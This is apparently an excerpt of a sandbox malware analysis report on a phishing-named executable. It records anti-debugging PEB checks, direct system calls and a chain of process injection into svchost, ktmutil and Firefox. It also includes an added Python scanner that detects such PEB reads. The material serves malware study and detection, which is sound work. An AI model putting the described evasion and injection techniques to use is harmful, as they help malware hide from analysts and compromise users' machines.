                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h] (x4)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h] (x7)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h] (x9)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h] (x3)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h] (x6)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h] (x13)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] (x4)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
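The listing above is the sandbox's enumeration of every `mov r32, dword ptr fs:[30h]` in the code injected into svchost.exe. In a 32-bit (WOW64) process fs:[0x30] holds the PEB pointer, and the fields read right after it (BeingDebugged at +0x02, NtGlobalFlag at +0x68) are the usual hand-rolled replacement for IsDebuggerPresent, which is why the sandbox lists them under debugger detection. The Python script below is an added example, not part of this report or of Joe Sandbox: it performs the same static check over raw x86 code bytes and names the PEB field the next instruction touches. The instruction encodings and 32-bit PEB offsets are stated assumptions, and the sample bytes are constructed for the example, not taken from the analysed file.

```python
"""Static scan of 32-bit x86 code for PEB-pointer reads (mov r32, fs:[0x30]).

Assumed instruction encodings (Intel SDM, 32-bit mode):
  64 A1 <disp32>            mov eax, fs:[disp32]   (moffs32 short form)
  64 8B <modrm> <disp32>    mov r32, fs:[disp32]   (ModRM mod=00, rm=101)
The PEB field offsets are those of the 32-bit PEB seen by a WOW64 process.
"""
import struct

FS_PREFIX = 0x64
PEB_OFFSET = 0x30
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# PEB fields anti-debug code typically reads right after fetching the pointer
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}


def find_peb_reads(code: bytes):
    """Return [(offset, register)] for every 'mov r32, fs:[0x30]' in code."""
    hits, i, n = [], 0, len(code)
    while i < n:
        if code[i] != FS_PREFIX:
            i += 1
            continue
        if i + 6 <= n and code[i + 1] == 0xA1:            # 64 A1 disp32 -> eax
            if struct.unpack_from("<I", code, i + 2)[0] == PEB_OFFSET:
                hits.append((i, "eax"))
                i += 6
                continue
        if i + 7 <= n and code[i + 1] == 0x8B:            # 64 8B modrm disp32
            modrm = code[i + 2]
            disp = struct.unpack_from("<I", code, i + 3)[0]
            if (modrm & 0xC7) == 0x05 and disp == PEB_OFFSET:
                hits.append((i, REGS[(modrm >> 3) & 7]))
                i += 7
                continue
        i += 1
    return hits


def peb_field_after(code: bytes, off: int, reg: str):
    """Name the PEB field touched by the instruction that follows the PEB load
    at off (movzx/mov/cmp/test with a [reg+disp8] operand), else None."""
    r = REGS.index(reg)
    p = off + (6 if code[off + 1] == 0xA1 else 7)       # skip the fs:[0x30] load
    nxt = code[p:p + 4]
    # (opcode bytes, index of the ModRM byte); 80 /7 is cmp, F6 /0 is test
    for opc, mi in ((b"\x0f\xb6", 2), (b"\x8b", 1), (b"\x80", 1), (b"\xf6", 1)):
        if nxt.startswith(opc) and len(nxt) > mi + 1:
            modrm = nxt[mi]
            if (modrm & 0xC7) == (0x40 | r):            # [reg + disp8]
                return PEB_FIELDS.get(nxt[mi + 1])
    return None


def scan(code: bytes, base: int = 0):
    """Sandbox-style listing: [(virtual address, register, PEB field)]."""
    return [(base + off, reg, peb_field_after(code, off, reg))
            for off, reg in find_peb_reads(code)]


# Constructed sample (not bytes from the analysed file): an anti-debug prologue
# that checks BeingDebugged and NtGlobalFlag, then walks to Ldr.
SAMPLE = bytes.fromhex(
    "558bec"            # push ebp; mov ebp, esp
    "64a130000000"      # mov eax, dword ptr fs:[30h]
    "0fb64002"          # movzx eax, byte ptr [eax+2]     BeingDebugged
    "85c0"              # test eax, eax
    "648b0d30000000"    # mov ecx, dword ptr fs:[30h]
    "f6416870"          # test byte ptr [ecx+68h], 70h    NtGlobalFlag heap flags
    "648b1530000000"    # mov edx, dword ptr fs:[30h]
    "8b520c"            # mov edx, dword ptr [edx+0Ch]    Ldr
    "c3"                # ret
)

if __name__ == "__main__":
    for va, reg, field in scan(SAMPLE, base=0x03730000):
        print(f"{va:08X} mov {reg}, dword ptr fs:[00000030h] -> {field}")
```

Run against a dumped code section with its load address as `base` to reproduce the sandbox listing; a hit whose next instruction is not one of the four forms is reported with field None, so hand-check those, since the field read may simply be a few instructions further on.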

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtTerminateProcess: Direct from: 0x77382D5C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
                Source: C:\Users\user\Desktop\Shipping documents..exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe protection: read write
                Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ktmutil.exe Thread register set: target process: 4836
                Source: C:\Windows\SysWOW64\ktmutil.exe Thread APC queued: target process: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                Source: C:\Users\user\Desktop\Shipping documents..exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C2E008
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_00436CD7 LogonUserW
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
                Source: C:\Users\user\Desktop\Shipping documents..exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping documents..exe"
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
                Source: C:\Windows\SysWOW64\ktmutil.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
                Source: Shipping documents..exe, FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: Shipping documents..exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\Shipping documents..exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
